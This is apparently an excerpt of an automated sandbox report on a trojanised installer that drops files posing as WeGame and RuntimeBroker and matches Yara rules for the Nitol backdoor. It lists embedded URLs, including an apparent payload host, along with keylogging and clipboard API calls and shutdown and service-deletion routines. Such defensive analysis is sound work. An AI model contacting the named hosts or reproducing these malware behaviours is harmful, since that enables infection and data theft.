                    Source: setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr, adapt_for_imports.dll.0.dr, jli.dll.0.dr, libcef.dll.0.dr, Wegame.exe.0.dr, common.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
                    Source: setup#U67e5#U8be2_pf2024.exe, adapt_for_imports.dll.0.dr, Wegame.exe.0.dr, common.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                    Source: setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr, jli.dll.0.dr, libcef.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                    Source: setup#U67e5#U8be2_pf2024.exe, jli.dll.0.dr, libcef.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                    Source: setup#U67e5#U8be2_pf2024.exe, adapt_for_imports.dll.0.dr, Wegame.exe.0.dr, common.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                    Source: setup#U67e5#U8be2_pf2024.exe, adapt_for_imports.dll.0.dr, Wegame.exe.0.dr, common.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: setup#U67e5#U8be2_pf2024.exe, jli.dll.0.dr, libcef.dll.0.drString found in binary or memory: http://crl3.digicert.com/EVCodeSigning-g1.crl03
                    Source: setup#U67e5#U8be2_pf2024.exe, jli.dll.0.dr, libcef.dll.0.drString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
                    Source: setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr, adapt_for_imports.dll.0.dr, Wegame.exe.0.dr, common.dll.0.drString found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
                    Source: setup#U67e5#U8be2_pf2024.exe, adapt_for_imports.dll.0.dr, Wegame.exe.0.dr, common.dll.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                    Source: setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr, jli.dll.0.dr, libcef.dll.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                    Source: setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr, jli.dll.0.dr, libcef.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
                    Source: setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr, adapt_for_imports.dll.0.dr, jli.dll.0.dr, libcef.dll.0.dr, Wegame.exe.0.dr, common.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr, adapt_for_imports.dll.0.dr, jli.dll.0.dr, libcef.dll.0.dr, Wegame.exe.0.dr, common.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                    Source: setup#U67e5#U8be2_pf2024.exe, jli.dll.0.dr, libcef.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                    Source: setup#U67e5#U8be2_pf2024.exe, jli.dll.0.dr, libcef.dll.0.drString found in binary or memory: http://crl4.digicert.com/EVCodeSigning-g1.crl0K
                    Source: setup#U67e5#U8be2_pf2024.exe, jli.dll.0.dr, libcef.dll.0.drString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
                    Source: setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr, adapt_for_imports.dll.0.dr, Wegame.exe.0.dr, common.dll.0.drString found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
                    Source: setup#U67e5#U8be2_pf2024.exe, adapt_for_imports.dll.0.dr, Wegame.exe.0.dr, common.dll.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                    Source: setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr, jli.dll.0.dr, libcef.dll.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                    Source: setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr, adapt_for_imports.dll.0.dr, jli.dll.0.dr, libcef.dll.0.dr, Wegame.exe.0.dr, common.dll.0.drString found in binary or memory: http://ocsp.digicert.com0A
                    Source: setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr, adapt_for_imports.dll.0.dr, jli.dll.0.dr, libcef.dll.0.dr, Wegame.exe.0.dr, common.dll.0.drString found in binary or memory: http://ocsp.digicert.com0C
                    Source: setup#U67e5#U8be2_pf2024.exe, jli.dll.0.dr, libcef.dll.0.drString found in binary or memory: http://ocsp.digicert.com0H
                    Source: setup#U67e5#U8be2_pf2024.exe, jli.dll.0.dr, libcef.dll.0.drString found in binary or memory: http://ocsp.digicert.com0I
                    Source: setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr, adapt_for_imports.dll.0.dr, Wegame.exe.0.dr, common.dll.0.drString found in binary or memory: http://ocsp.digicert.com0L
                    Source: setup#U67e5#U8be2_pf2024.exe, adapt_for_imports.dll.0.dr, Wegame.exe.0.dr, common.dll.0.drString found in binary or memory: http://ocsp.digicert.com0N
                    Source: setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr, jli.dll.0.dr, libcef.dll.0.drString found in binary or memory: http://ocsp.digicert.com0O
                    Source: setup#U67e5#U8be2_pf2024.exe, adapt_for_imports.dll.0.dr, Wegame.exe.0.dr, common.dll.0.drString found in binary or memory: http://ocsp.digicert.com0X
                    Source: setup#U67e5#U8be2_pf2024.exe, kill.exe.0.dr, RuntimeBroker.exe.0.dr, Lua51.dll.0.dr, winPre2k.iso.0.drString found in binary or memory: http://ocsp.thawte.com0
                    Source: setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr, kill.exe.0.dr, RuntimeBroker.exe.0.dr, Lua51.dll.0.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                    Source: setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr, kill.exe.0.dr, RuntimeBroker.exe.0.dr, Lua51.dll.0.drString found in binary or memory: http://s2.symcb.com0
                    Source: setup#U67e5#U8be2_pf2024.exe, Lua51.dll.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
                    Source: setup#U67e5#U8be2_pf2024.exe, Lua51.dll.0.drString found in binary or memory: http://sf.symcb.com/sf.crl0a
                    Source: setup#U67e5#U8be2_pf2024.exe, Lua51.dll.0.drString found in binary or memory: http://sf.symcb.com/sf.crt0
                    Source: setup#U67e5#U8be2_pf2024.exe, Lua51.dll.0.drString found in binary or memory: http://sf.symcd.com0&
                    Source: setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr, RuntimeBroker.exe.0.dr, Lua51.dll.0.drString found in binary or memory: http://sv.symcb.com/sv.crl0a
                    Source: setup#U67e5#U8be2_pf2024.exe, kill.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crl0f
                    Source: setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr, kill.exe.0.dr, RuntimeBroker.exe.0.dr, Lua51.dll.0.drString found in binary or memory: http://sv.symcb.com/sv.crt0
                    Source: setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr, kill.exe.0.dr, RuntimeBroker.exe.0.dr, Lua51.dll.0.drString found in binary or memory: http://sv.symcd.com0&
                    Source: setup#U67e5#U8be2_pf2024.exe, kill.exe.0.dr, RuntimeBroker.exe.0.dr, Lua51.dll.0.dr, winPre2k.iso.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                    Source: setup#U67e5#U8be2_pf2024.exe, kill.exe.0.dr, RuntimeBroker.exe.0.dr, Lua51.dll.0.dr, winPre2k.iso.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                    Source: setup#U67e5#U8be2_pf2024.exe, kill.exe.0.dr, RuntimeBroker.exe.0.dr, Lua51.dll.0.dr, winPre2k.iso.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                    Source: setup#U67e5#U8be2_pf2024.exe, Wegame.exe.0.drString found in binary or memory: http://ue.qq.com/mur/?a=survey&b=15087&c=1&d=15272af955762c32696995ddcabc396a
                    Source: setup#U67e5#U8be2_pf2024.exe, Wegame.exe.0.drString found in binary or memory: http://ue.qq.com/mur/?a=survey&b=15087&c=1&d=15272af955762c32696995ddcabc396a-s-f
                    Source: setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr, adapt_for_imports.dll.0.dr, jli.dll.0.dr, libcef.dll.0.dr, Wegame.exe.0.dr, common.dll.0.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                    Source: setup#U67e5#U8be2_pf2024.exe, RuntimeBroker.exe.0.drString found in binary or memory: http://www.google.com
                    Source: setup#U67e5#U8be2_pf2024.exe, RuntimeBroker.exe.0.drString found in binary or memory: http://www.google.comcefsimplestring
                    Source: setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr, kill.exe.0.dr, RuntimeBroker.exe.0.dr, Lua51.dll.0.drString found in binary or memory: http://www.symauth.com/cps0(
                    Source: setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr, kill.exe.0.dr, RuntimeBroker.exe.0.dr, Lua51.dll.0.drString found in binary or memory: http://www.symauth.com/rpa00
                    Source: setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr, winPre2k.iso.0.drString found in binary or memory: http://www.vmware.com/0
                    Source: setup#U67e5#U8be2_pf2024.exe, wm.exe.0.drString found in binary or memory: http://www.vmware.com/0/
                    Source: wm.exe.0.drString found in binary or memory: http://www.vmware.com/go/vcloud_login
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drString found in binary or memory: http://www.vmware.com/support/reference/common/info_tools.html.
                    Source: setup#U67e5#U8be2_pf2024.exe, Wegame.exe.0.drString found in binary or memory: http://www.winimage.com/zLibDll
                    Source: setup#U67e5#U8be2_pf2024.exe, Wegame.exe.0.drString found in binary or memory: http://www.winimage.com/zLibDll1.2.5
                    Source: setup#U67e5#U8be2_pf2024.exe, 00000000.00000002.2246415889.0000000001FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chengwangbaikou-1322151504.cos.ap-beijing.myqcloud.com/
                    Source: setup#U67e5#U8be2_pf2024.exeString found in binary or memory: https://chengwangbaikou-1322151504.cos.ap-beijing.myqcloud.com/guofucheng.txt
                    Source: setup#U67e5#U8be2_pf2024.exe, 00000000.00000002.2246415889.0000000002019000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chengwangbaikou-1322151504.cos.ap-beijing.myqcloud.com/guofucheng.txtPF
                    Source: setup#U67e5#U8be2_pf2024.exe, 00000000.00000002.2246646530.0000000003A60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chengwangbaikou-1322151504.cos.ap-beijing.myqcloud.com/guofucheng.txtl
                    Source: setup#U67e5#U8be2_pf2024.exe, 00000000.00000002.2246415889.0000000002019000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chengwangbaikou-1322151504.cos.ap-beijing.myqcloud.com/guofucheng.txtmF
                    Source: setup#U67e5#U8be2_pf2024.exe, common.dll.0.drString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
                    Source: setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr, kill.exe.0.dr, RuntimeBroker.exe.0.dr, Lua51.dll.0.drString found in binary or memory: https://d.symcb.com/cps0%
                    Source: setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr, kill.exe.0.dr, RuntimeBroker.exe.0.dr, Lua51.dll.0.drString found in binary or memory: https://d.symcb.com/rpa0
                    Source: setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr, adapt_for_imports.dll.0.dr, jli.dll.0.dr, libcef.dll.0.dr, Wegame.exe.0.dr, common.dll.0.drString found in binary or memory: https://www.digicert.com/CPS0
                    Source: setup#U67e5#U8be2_pf2024.exe, Lua51.dll.0.drString found in binary or memory: https://www.globalsign.com/repository/0
                    Source: setup#U67e5#U8be2_pf2024.exe, Lua51.dll.0.drString found in binary or memory: https://www.globalsign.com/repository/06
                    Source: setup#U67e5#U8be2_pf2024.exe, RuntimeBroker.exe.0.drString found in binary or memory: https://www.xiami.com/0
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                    Source: unknownHTTPS traffic detected: 82.156.94.17:443 -> 192.168.2.6:49699 version: TLS 1.2
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_035220C4 OpenClipboard,GetClipboardData,GlobalFix,GlobalUnWire,CloseClipboard,6_2_035220C4
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_03522634 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,GlobalUnWire,SetClipboardData,CloseClipboard,6_2_03522634
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_10001A30 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,GlobalUnWire,SetClipboardData,CloseClipboard,6_2_10001A30
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_035220C4 OpenClipboard,GetClipboardData,GlobalFix,GlobalUnWire,CloseClipboard,6_2_035220C4
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_035232A4 Sleep,lstrlen,GetAsyncKeyState,lstrcat,lstrlen,lstrcat,lstrcat,6_2_035232A4
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_0058BB0C GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetSecurityInfo,GetProcessWindowStation,SetProcessWindowStation,CreateDesktopW,LocalFree,LocalFree,CreateDesktopW,LocalFree,SetProcessWindowStation,6_2_0058BB0C

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 6.2.RuntimeBroker.exe.3314c24.1.unpack, type: UNPACKEDPEMatched rule: Detects Nitol backdoor Author: ditekSHen
                    Source: 6.2.RuntimeBroker.exe.3520c04.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Nitol backdoor Author: ditekSHen
                    Source: 6.2.RuntimeBroker.exe.3314c24.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Nitol backdoor Author: ditekSHen
                    Source: 6.2.RuntimeBroker.exe.3520c04.2.unpack, type: UNPACKEDPEMatched rule: Detects Nitol backdoor Author: ditekSHen
                    PE file has a writeable .text section
                    Source: setup#U67e5#U8be2_pf2024.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_6BD840E5: __EH_prolog3_GS,memset,__snprintf_s,CreateFileA,memset,memmove,DeviceIoControl,FindCloseChangeNotification,3_2_6BD840E5
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_035248E4 Sleep,OpenSCManagerA,OpenServiceA,DeleteService,GetSystemDirectoryA,lstrcat,DeleteFileA,exit,6_2_035248E4
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_005787E0 CreateProcessAsUserW,AssignProcessToJobObject,OpenProcessToken,GetTokenInformation,GetLastError,GetLastError,TerminateProcess,SetThreadToken,GetLastError,TerminateProcess,GetLastError,TerminateProcess,GetLastError,TerminateProcess,6_2_005787E0
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_035222D4 CreateFileA,WriteFile,CloseHandle,Sleep,GetVersion,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,exit,6_2_035222D4
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_035239A4 ExitWindowsEx,6_2_035239A4
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_10002DA0 ExitWindowsEx,6_2_10002DA0
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_100016D0 CreateFileA,WriteFile,CloseHandle,Sleep,GetVersion,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,exit,6_2_100016D0
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_004240503_2_00424050
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_004582233_2_00458223
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_004062C03_2_004062C0
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_0042E4203_2_0042E420
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_004244903_2_00424490
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_0042E6903_2_0042E690
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_004246B03_2_004246B0
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_0041E7403_2_0041E740
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_0042C7403_2_0042C740
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_004328603_2_00432860
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_004308703_2_00430870
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_0042E8B03_2_0042E8B0
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_004369A03_2_004369A0
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_00428AE03_2_00428AE0
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_00422B503_2_00422B50
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_00438D603_2_00438D60
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_00426F403_2_00426F40
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_00424F203_2_00424F20
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_004292083_2_00429208
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_004312F03_2_004312F0
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_004294533_2_00429453
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_004055003_2_00405500
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_004236103_2_00423610
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_0045785A3_2_0045785A
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_004318203_2_00431820
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_004379A03_2_004379A0
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_004339B03_2_004339B0
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_00457A923_2_00457A92
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_00415C203_2_00415C20
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_00457CBB3_2_00457CBB
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_00431D003_2_00431D00
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_00419DB03_2_00419DB0
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_00457F663_2_00457F66
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_1001B6403_2_1001B640
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_100157803_2_10015780
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_1001D88D3_2_1001D88D
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_10015C743_2_10015C74
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_10015DBF3_2_10015DBF
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_100162BF3_2_100162BF
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_100164683_2_10016468
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_1001655C3_2_1001655C
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_100166393_2_10016639
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_100267A53_2_100267A5
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_100167C03_2_100167C0
                    Source: C:\Users\Statr\kill.exeCode function: 4_2_6C7C4C824_2_6C7C4C82
                    Source: C:\Users\Statr\kill.exeCode function: 4_2_6C7C05D44_2_6C7C05D4
                    Source: C:\Users\Statr\kill.exeCode function: 4_2_6C7C15C14_2_6C7C15C1
                    Source: C:\Users\Statr\kill.exeCode function: 4_2_6C7C66244_2_6C7C6624
                    Source: C:\Users\Statr\kill.exeCode function: 4_2_6C7C0E074_2_6C7C0E07
                    Source: C:\Users\Statr\kill.exeCode function: 4_2_6C7C47314_2_6C7C4731
                    Source: C:\Users\Statr\kill.exeCode function: 4_2_6C7C58AF4_2_6C7C58AF
                    Source: C:\Users\Statr\kill.exeCode function: 4_2_6C7C11D94_2_6C7C11D9
                    Source: C:\Users\Statr\kill.exeCode function: 4_2_6C7C51D34_2_6C7C51D3
                    Source: C:\Users\Statr\kill.exeCode function: 4_2_6C7C0A694_2_6C7C0A69
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_0057E2306_2_0057E230
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_005F02A96_2_005F02A9
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_005864306_2_00586430
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_005985206_2_00598520
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_005DC7A06_2_005DC7A0
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_005DC8DB6_2_005DC8DB
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_005969806_2_00596980
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_00596A106_2_00596A10
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_005F4CF36_2_005F4CF3
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_005DCD6F6_2_005DCD6F
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_005B0D106_2_005B0D10
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_005A0E906_2_005A0E90
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_005810A56_2_005810A5
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_005DD1276_2_005DD127
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_005A12506_2_005A1250
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_0058F2566_2_0058F256
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_005EB22C6_2_005EB22C
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_005E73306_2_005E7330
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_005DD4FC6_2_005DD4FC
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_005DD8C16_2_005DD8C1
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_0057F8B06_2_0057F8B0
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_005D9B296_2_005D9B29
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_00591B906_2_00591B90
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_005E1D7A6_2_005E1D7A
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_005EDD0A6_2_005EDD0A
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_005DDE606_2_005DDE60
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_005EDE376_2_005EDE37
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_0058BF106_2_0058BF10
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_005E1FA26_2_005E1FA2
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_035200316_2_03520031
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_0352C0646_2_0352C064
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_0352A49D6_2_0352A49D
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_0352B4B46_2_0352B4B4
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_0352B9546_2_0352B954
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_0352BDD46_2_0352BDD4
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_03529D8F6_2_03529D8F
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_03529CE36_2_03529CE3
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_100098996_2_10009899
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_1000A8B06_2_1000A8B0
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_1000B1D06_2_1000B1D0
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_1000B4606_2_1000B460
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_1000AD506_2_1000AD50
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_100095EE6_2_100095EE
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_10008EE06_2_10008EE0
                    Source: C:\Users\Wegame\Wegame.exeCode function: String function: 0046E476 appears 153 times
                    Source: C:\Users\Wegame\Wegame.exeCode function: String function: 0046E3EC appears 71 times
                    Source: C:\Users\Wegame\Wegame.exeCode function: String function: 00420E50 appears 67 times
                    Source: C:\Users\Wegame\Wegame.exeCode function: String function: 6BD1E945 appears 31 times
                    Source: C:\Users\Wegame\Wegame.exeCode function: String function: 004136E0 appears 127 times
                    Source: C:\Users\Wegame\Wegame.exeCode function: String function: 6BE22E86 appears 65 times
                    Source: C:\Users\Wegame\Wegame.exeCode function: String function: 0046E4AD appears 39 times
                    Source: C:\Users\Wegame\Wegame.exeCode function: String function: 0043F4BB appears 116 times
                    Source: C:\Users\Wegame\Wegame.exeCode function: String function: 00435590 appears 53 times
                    Source: C:\Users\Wegame\Wegame.exeCode function: String function: 100027D0 appears 48 times
                    Source: C:\Users\Wegame\Wegame.exeCode function: String function: 0046E442 appears 320 times
                    Source: C:\Users\Statr\kill.exeCode function: String function: 6C7BC7E0 appears 38 times
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: String function: 005DA3CE appears 39 times
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: String function: 005DB420 appears 44 times
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: String function: 005817C9 appears 31 times
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: String function: 005791F0 appears 55 times
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: String function: 005790B0 appears 35 times
                    Source: setup#U67e5#U8be2_pf2024.exe, 00000000.00000002.2244374973.00000000014E1000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSetAllUsers.dllP vs setup#U67e5#U8be2_pf2024.exe
                    Source: setup#U67e5#U8be2_pf2024.exe, 00000000.00000002.2244374973.00000000014E1000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamehhupd.exeL vs setup#U67e5#U8be2_pf2024.exe
                    Source: setup#U67e5#U8be2_pf2024.exe, 00000000.00000000.2075450866.000000000049E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWeGame. vs setup#U67e5#U8be2_pf2024.exe
                    Source: setup#U67e5#U8be2_pf2024.exe, 00000000.00000000.2075450866.000000000049E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamepolicytool.exeN vs setup#U67e5#U8be2_pf2024.exe
                    Source: setup#U67e5#U8be2_pf2024.exe, 00000000.00000000.2075450866.000000000049E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameD vs setup#U67e5#U8be2_pf2024.exe
                    Source: setup#U67e5#U8be2_pf2024.exe, 00000000.00000000.2075450866.000000000049E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamevmware.exeF vs setup#U67e5#U8be2_pf2024.exe
                    Source: setup#U67e5#U8be2_pf2024.exe, 00000000.00000002.2244374973.000000000049E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWeGame. vs setup#U67e5#U8be2_pf2024.exe
                    Source: setup#U67e5#U8be2_pf2024.exe, 00000000.00000002.2244374973.000000000049E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamepolicytool.exeN vs setup#U67e5#U8be2_pf2024.exe
                    Source: setup#U67e5#U8be2_pf2024.exe, 00000000.00000002.2244374973.000000000049E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameD vs setup#U67e5#U8be2_pf2024.exe
                    Source: setup#U67e5#U8be2_pf2024.exe, 00000000.00000002.2244374973.000000000049E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamevmware.exeF vs setup#U67e5#U8be2_pf2024.exe
                    Source: setup#U67e5#U8be2_pf2024.exe, 00000000.00000001.2077759077.0000000001445000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenametoolsinstutil.dll: vs setup#U67e5#U8be2_pf2024.exe
                    Source: setup#U67e5#U8be2_pf2024.exe, 00000000.00000002.2246839642.00000000046A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs setup#U67e5#U8be2_pf2024.exe
                    Source: setup#U67e5#U8be2_pf2024.exe, 00000000.00000002.2246839642.00000000046A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName< vs setup#U67e5#U8be2_pf2024.exe
